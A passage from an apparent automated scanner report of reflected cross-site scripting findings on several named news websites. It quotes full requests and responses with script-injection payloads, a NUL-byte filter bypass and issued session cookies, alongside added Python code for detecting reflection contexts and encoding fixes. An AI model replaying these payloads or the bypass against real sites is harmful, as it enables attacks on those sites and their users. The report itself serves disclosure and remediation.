           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?bf22b'-alert(1)-'37d290c00bd=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?bf22b'-alert(1)-'37
...[SNIP]...

2.359. http://www.pcadvisor.co.uk/news/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcadvisor.co.uk
Path:   /news/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69011"><script>alert(1)</script>9de57f216aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/index.cfm?newsid=3253825&rss&69011"><script>alert(1)</script>9de57f216aa=1 HTTP/1.1
Host: www.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 13:36:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25969891;expires=Sat, 08-Dec-2040 13:36:48 GMT;path=/
Set-Cookie: CFTOKEN=e585d5aa820ec83e-EF65B19A-1EC9-D5E4-1078FEB614A0F34A;expires=Sat, 08-Dec-2040 13:36:48 GMT;path=/
Set-Cookie: JSESSIONID=d230e6d6fe3c111160ed451f7a7b7a3a5c10;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<form action="/news/index.cfm?newsid=3253825&rss&69011"><script>alert(1)</script>9de57f216aa=1#commentsform" name="newscommentsform" id="newscommentsform" method="post" onsubmit="return checkCommentForm(this)">
...[SNIP]...
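
The "Issue detail" paragraphs in this report rest on two checks: where in the response the marker landed (a double-quoted attribute value, text between tags, or a JavaScript string literal, as in the request_uri reflection above) and whether the break-out characters of the payload came back unencoded. The following is an added example, not code from the report or from any of the sites it covers, that performs those checks over response fragments constructed to mirror the ones quoted here; the context detection is a heuristic scan (it does not handle JavaScript regex literals), and the sample bodies are constructed, not captured traffic.

```python
"""Reflection-context checks behind the "Issue detail" wording above (added example)."""
from typing import List, Optional, Tuple


def _open_attr_quote(tag_text: str) -> Optional[str]:
    """Quote character of an attribute value still open at the end of tag_text, else None."""
    quote = None
    for ch in tag_text:
        if quote is None:
            if ch in '"\'':
                quote = ch
        elif ch == quote:
            quote = None
    return quote


def _open_js_quote(js: str) -> Optional[str]:
    """Quote character of an unterminated JS string literal at the end of js, else None.
    Honours backslash escapes and skips // and /* */ comments (heuristic: no regex literals)."""
    quote, i = None, 0
    while i < len(js):
        ch = js[i]
        if quote is not None:
            if ch == '\\':
                i += 1                       # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in '"\'':
            quote = ch
        elif js.startswith('//', i):         # line comment: jump to end of line
            nl = js.find('\n', i)
            i = len(js) if nl == -1 else nl
        elif js.startswith('/*', i):         # block comment: jump past */
            end = js.find('*/', i + 2)
            i = len(js) if end == -1 else end + 1
        i += 1
    return quote


def reflection_context(body: str, offset: int) -> Tuple[str, Optional[str]]:
    """Where position `offset` of `body` sits:
    ('script', q)    in a <script> body, q = quote of an open string literal or None
    ('attribute', q) in a q-quoted attribute value
    ('tag', None)    in a tag, outside any quoted value
    ('text', None)   between tags"""
    before = body[:offset]
    lower = before.lower()
    if lower.rfind('<script') > lower.rfind('</script'):
        body_start = before.find('>', lower.rfind('<script'))
        if body_start != -1:                 # in the script body, not in the <script ...> tag itself
            return ('script', _open_js_quote(before[body_start + 1:]))
    lt, gt = before.rfind('<'), before.rfind('>')
    if lt > gt:
        quote = _open_attr_quote(before[lt:])
        return ('attribute', quote) if quote else ('tag', None)
    return ('text', None)


def breaks_out(context: Tuple[str, Optional[str]], payload: str) -> bool:
    """Does the payload carry the character that closes the context it landed in?"""
    kind, quote = context
    if kind == 'attribute':
        return quote in payload
    if kind == 'tag':
        return '>' in payload
    if kind == 'script':
        return quote is None or quote in payload   # bare code context needs nothing
    return '<' in payload                          # text: a new tag is enough


def analyze(body: str, marker: str, payload: str) -> List[dict]:
    """One record per reflection of `marker`, the random prefix of `payload`.
    echoed_unmodified: the whole payload appears verbatim there;
    exploitable: it does, and it contains the break-out character for that context."""
    records, pos = [], 0
    while True:
        pos = body.find(marker, pos)
        if pos == -1:
            return records
        ctx = reflection_context(body, pos)
        verbatim = body.startswith(payload, pos)
        records.append({'offset': pos, 'context': ctx, 'echoed_unmodified': verbatim,
                        'exploitable': verbatim and breaks_out(ctx, payload)})
        pos += len(marker)


# Constructed response fragments modelled on the ones quoted in this report (not captured traffic).
ATTR_RESPONSE = ('<form action="/news/index.cfm?newsid=3253825&rss&'
                 '69011"><script>alert(1)</script>9de57f216aa=1#commentsform" method="post">')
TEXT_RESPONSE = '<strong class="active">wwgd995a1<script>alert(1)</script>7d913aca67c</strong>'
JS_RESPONSE = ('<script type="text/javascript">\n'
               "var page = { nwchannel: 'Network World',\n"
               "  request_uri: '/?bf22b'-alert(1)-'37d290c00bd=1' };\n"
               'var jq_request_uri = "/?bf22b\'-alert(1)-\'37d290c00bd=1";\n'
               '</script>')
# Same attribute sink with the output HTML-encoded: the marker is found, the payload is not.
ENCODED_RESPONSE = ('<form action="/news/index.cfm?newsid=3253825&amp;rss&amp;'
                    '69011&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;9de57f216aa=1" method="post">')

if __name__ == '__main__':
    cases = [('attribute', ATTR_RESPONSE, '69011', '69011"><script>alert(1)</script>9de57f216aa'),
             ('text', TEXT_RESPONSE, '995a1', '995a1<script>alert(1)</script>7d913aca67c'),
             ('js string', JS_RESPONSE, 'bf22b', "bf22b'-alert(1)-'37d290c00bd"),
             ('encoded', ENCODED_RESPONSE, '69011', '69011"><script>alert(1)</script>9de57f216aa')]
    for name, body, marker, payload in cases:
        for record in analyze(body, marker, payload):
            print(name, record)
```

The JavaScript sample is the instructive one: the same marker is reflected twice, once inside a single-quoted literal, where the `'-alert(1)-'` payload closes the string and runs, and once inside a double-quoted literal, where the same payload stays inert. A payload has to be chosen per reflection, which is why the scanner reports the context along with the echo.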

2.360. http://www.pcadvisor.co.uk/news/index.cfm [rss parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcadvisor.co.uk
Path:   /news/index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5723"><script>alert(1)</script>8cec92d4daf was submitted in the rss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/index.cfm?newsid=3253825&rssc5723"><script>alert(1)</script>8cec92d4daf HTTP/1.1
Host: www.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 13:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25969888;expires=Sat, 08-Dec-2040 13:36:45 GMT;path=/
Set-Cookie: CFTOKEN=ac5f30b92fefe84f-EF65A46C-1EC9-D5E4-10097E4FE62FF2EF;expires=Sat, 08-Dec-2040 13:36:45 GMT;path=/
Set-Cookie: JSESSIONID=d2309f8d5e6d79efe173136f1f5c65394658;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<form action="/news/index.cfm?newsid=3253825&rssc5723"><script>alert(1)</script>8cec92d4daf#commentsform" name="newscommentsform" id="newscommentsform" method="post" onsubmit="return checkCommentForm(this)">
...[SNIP]...

2.361. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcw.gr
Path:   /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 323b5"><a>3b18e4e2d30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Finding 2.362 below shows the same del.icio.us share link echoing a complete <script> payload supplied as a query-string parameter name, so the sink is the same and the obstacle, if there is one, concerns how the path component is handled rather than any encoding at the point of output.

Request

GET /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html323b5"><a>3b18e4e2d30 HTTP/1.1
Host: www.pcw.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Thu, 16 Dec 2010 13:37:07 GMT
Content-Type: text/html; charset=ISO-8859-7
Connection: close
Set-Cookie: PHPSESSID=f3e06ea129947e25d080d013bd0ae752; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 108285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7">
<title
...[SNIP]...
<a href="http://del.icio.us/post?http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html323b5"><a>3b18e4e2d30">
...[SNIP]...

2.362. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcw.gr
Path:   /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708ff"><script>alert(1)</script>7ecb38db66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html?708ff"><script>alert(1)</script>7ecb38db66b=1 HTTP/1.1
Host: www.pcw.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Thu, 16 Dec 2010 13:36:55 GMT
Content-Type: text/html; charset=ISO-8859-7
Connection: close
Set-Cookie: PHPSESSID=39a9fd97ec0d33669b3c59b960c95214; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 110688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7">
<title
...[SNIP]...
<a href="http://del.icio.us/post?http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html?708ff"><script>alert(1)</script>7ecb38db66b=1">
...[SNIP]...

2.363. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.it
Path:   /notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38c42<a%20b%3dc>f35e1c5047 was submitted in the REST URL parameter 2. This input was echoed as 38c42<a b=c>f35e1c5047 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note also that the 1029-byte response is not the article page but a PHP DEBUG_BACKTRACE table (file, function and arguments, beginning with a path under /home), so the malformed segment is also triggering an error handler that discloses server-side file paths.

Request

GET /notizia/12081738c42<a%20b%3dc>f35e1c5047/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html HTTP/1.1
Host: www.pcworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:36:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m951f9k65hl0pogrkf4stam5k6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1029
Connection: close
Content-Type: text/html

<table rules="all" style="font-family: arial;font-size:11px;border:1px solid green;"><caption><em>DEBUG_BACKTRACE</em></caption><tr><th>File</th><th>Funzione</th><th>Args</th></tr><tbody><tr><td>/home
...[SNIP]...
<td>1. 12081738c42<a b=c>f35e1c5047 ( string )<br />
...[SNIP]...

2.364. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.it
Path:   /notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9911f"><script>alert(1)</script>176e5d70aaa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /notizia/120817/2010-12-169911f"><script>alert(1)</script>176e5d70aaa/LG-Optimus-2X-il-primo-smartphone-dual-core.html HTTP/1.1
Host: www.pcworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:37:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ah484ppadmg4ltlefiku23nbo3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 38658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>LG Optimus 2X, il p
...[SNIP]...
<link rel="canonical" href="http://www.pcworld.it/notizia/120817/2010-12-169911f"><script>alert(1)</script>176e5d70aaa/LG-Optimus-2X-il-primo-smartphone-dual-core.html" />
...[SNIP]...

2.365. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.it
Path:   /notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0ae"><script>alert(1)</script>64ba604f6dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html3a0ae"><script>alert(1)</script>64ba604f6dd HTTP/1.1
Host: www.pcworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:37:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ic5qa3nv615i8n801523do1c93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 38683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>LG Optimus 2X, il p
...[SNIP]...
<link rel="canonical" href="http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html3a0ae"><script>alert(1)</script>64ba604f6dd" />
...[SNIP]...
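
The canonical-link findings above, the del.icio.us share link in 2.361 and 2.362 and the form action in 2.359 and 2.360 all share one pattern: the application rebuilds a URL pointing at itself from the raw request path or query string and writes it into a double-quoted attribute with no encoding at all. Two encodings are needed, in order: percent-encoding for the URL context and HTML encoding for the attribute context. The following is an added example in Python standing in for the PHP and ColdFusion code of the sites involved; it is not their code. It reproduces the vulnerable output, applies both encodings, and then parses each fragment the way a browser would to show that the payload no longer creates a tag. The host names and paths are taken from the requests quoted in this report; the functions and the parsed-tag check are constructed for this example.

```python
"""Encoding a self-referencing URL for a double-quoted HTML attribute (added example)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl, quote, urlencode


def self_url_raw(host: str, path: str, query: str = '') -> str:
    """The pattern behind the findings: path and query string are concatenated as received."""
    return 'http://' + host + path + ('?' + query if query else '')


def self_url_encoded(host: str, path: str, query: str = '') -> str:
    """URL-layer fix: percent-encode each path segment (quote() leaves only A-Z a-z 0-9 - . _ ~)
    and re-serialise the query with urlencode(), which percent-encodes names and values."""
    enc_path = '/'.join(quote(segment, safe='') for segment in path.split('/'))
    enc_query = urlencode(parse_qsl(query, keep_blank_values=True))
    return 'http://' + host + enc_path + ('?' + enc_query if enc_query else '')


def attribute_markup(tag: str, attr: str, url: str, html_encode: bool = True) -> str:
    """Attribute-layer fix: HTML-encode the value before it goes between the double quotes.
    html_encode=False reproduces the vulnerable output."""
    value = escape(url, quote=True) if html_encode else url
    return '<%s %s="%s">' % (tag, attr, value)


class _Collector(HTMLParser):
    """Parses a fragment as a browser would: which tags exist, and what the URL attributes decode to."""
    def __init__(self):
        super().__init__()
        self.tags, self.urls = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.urls.extend(v for k, v in attrs if k in ('href', 'action'))


def parse_fragment(fragment: str):
    """Return (tag names in document order, decoded href/action values)."""
    p = _Collector()
    p.feed(fragment)
    p.close()
    return p.tags, p.urls


# Inputs constructed from the requests quoted in this report.
PCW_PATH = '/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html323b5"><a>3b18e4e2d30'
PCADVISOR_QUERY = 'newsid=3253825&rss&69011"><script>alert(1)</script>9de57f216aa=1'

if __name__ == '__main__':
    for label, fragment in [
        ('vulnerable', attribute_markup('link', 'href', self_url_raw('www.pcw.gr', PCW_PATH), html_encode=False)),
        ('fixed     ', attribute_markup('link', 'href', self_url_encoded('www.pcw.gr', PCW_PATH))),
        ('vulnerable', attribute_markup('form', 'action',
                                        self_url_raw('www.pcadvisor.co.uk', '/news/index.cfm', PCADVISOR_QUERY),
                                        html_encode=False)),
        ('fixed     ', attribute_markup('form', 'action',
                                        self_url_encoded('www.pcadvisor.co.uk', '/news/index.cfm', PCADVISOR_QUERY))),
    ]:
        print(label, parse_fragment(fragment))
```

The order matters: percent-encoding first removes `"`, `<` and `>` from the URL itself, and HTML encoding then protects the attribute against whatever is left, notably the `&` between query parameters. Applying only the HTML layer would still leave a URL that means something different from the one the server handled; applying only the URL layer would break the moment a legitimate `&` or `'` reaches the attribute.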

2.366. http://www.plasticsnews.com/china/english/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plasticsnews.com
Path:   /china/english/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1b4"><script>alert(1)</script>7f8f83498ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /china/english/?9e1b4"><script>alert(1)</script>7f8f83498ba=1 HTTP/1.1
Host: www.plasticsnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:36:40 GMT
Server: Apache/2.2.0 (Fedora)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36735

<HTML>
<HEAD>
<TITLE>Plastics News - Breaking News</TITLE>
<link href="/css/pnchina.css?1290114845" rel="stylesheet" type="text/css">
<link href="/css/pnc_menus.css?1228407927" rel="stylesheet" type="
...[SNIP]...
<a href="/china/chinese/index.html?9e1b4"><script>alert(1)</script>7f8f83498ba=1">
...[SNIP]...

2.367. http://www.publish2.com/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008a412"><script>alert(1)</script>834a1042c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a412"><script>alert(1)</script>834a1042c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /contact?%008a412"><script>alert(1)</script>834a1042c16=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=48i45fdh098dp2cb0lffk21cs3; path=/
Set-Cookie: kohanasession=48i45fdh098dp2cb0lffk21cs3; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI0OGk0NWZkaDA5OGRwMmNiMGxmZmsyMWNzMyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/
Content-Length: 7095
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<form id="contactGeneral" method="post" action="http://www.publish2.com/contact?%008a412"><script>alert(1)</script>834a1042c16=1">
...[SNIP]...
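
The remediation detail above explains the %00 prefix in one sentence; the mechanism is worth seeing end to end. A filter written in native code treats the decoded parameter as a C string, which ends at the first NUL byte, so it inspects an empty string and passes the request; the PHP application behind it handles binary-safe strings and echoes the whole value. The response quoted above also shows that the query string is written into the action attribute raw, with the %00 still percent-encoded, which is harmless in itself; the `">` that follows is what terminates the attribute. The following is an added simulation, not the WAF or application code of publish2.com: the signature list, the C-string view and the two application variants are constructed for this example.

```python
"""NUL-byte filter bypass simulated with C-string vs binary-safe semantics (added example)."""
from html import escape
from urllib.parse import unquote_to_bytes

# Constructed toy rule set standing in for a WAF signature list (assumption, not any real product's rules).
BLOCKED = (b'<script', b'"><', b'javascript:')


def c_string(buf: bytes) -> bytes:
    """What strlen()/strstr()-style native code sees: the bytes up to the first NUL."""
    return buf.split(b'\x00', 1)[0]


def waf_native_blocks(raw_param: str) -> bool:
    """Filter with C-string semantics: it decodes %00 to NUL and then stops reading there."""
    view = c_string(unquote_to_bytes(raw_param)).lower()
    return any(sig in view for sig in BLOCKED)


def waf_binary_safe_blocks(raw_param: str) -> bool:
    """Same rules applied to the full decoded buffer (length-aware, as the vendor fix would be)."""
    view = unquote_to_bytes(raw_param).lower()
    return any(sig in view for sig in BLOCKED)


def app_reflects(raw_query: str) -> str:
    """The behaviour shown in the finding: the raw query string (%00 still percent-encoded)
    is written into the form's action attribute with no HTML encoding."""
    return '<form method="post" action="http://www.publish2.com/contact?%s">' % raw_query


def app_reflects_fixed(raw_query: str) -> str:
    """The real fix belongs here: HTML-encode the value before it goes between the quotes."""
    return '<form method="post" action="http://www.publish2.com/contact?%s">' % escape(raw_query, quote=True)


def request_outcome(raw_query: str, waf, app=app_reflects):
    """WAF in front of the application: None if the request was dropped, else the reflected fragment."""
    return None if waf(raw_query) else app(raw_query)


PAYLOAD = '8a412"><script>alert(1)</script>834a1042c16=1'   # the parameter from the finding, as sent

if __name__ == '__main__':
    for query in (PAYLOAD, '%00' + PAYLOAD):
        print(repr(query))
        print('  native-code filter :', 'blocked' if waf_native_blocks(query) else 'PASSED')
        print('  binary-safe filter :', 'blocked' if waf_binary_safe_blocks(query) else 'PASSED')
        print('  fixed app output   :', app_reflects_fixed(query))
```

The binary-safe filter closes this particular hole, but the ordering in the remediation text is the right one: with output encoding in the application the filter becomes defence in depth, whereas a filter alone is only ever as good as its string handling and its next bypass.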

2.368. http://www.publish2.com/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006a091"><script>alert(1)</script>ff942affee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a091"><script>alert(1)</script>ff942affee7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /login?%006a091"><script>alert(1)</script>ff942affee7=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
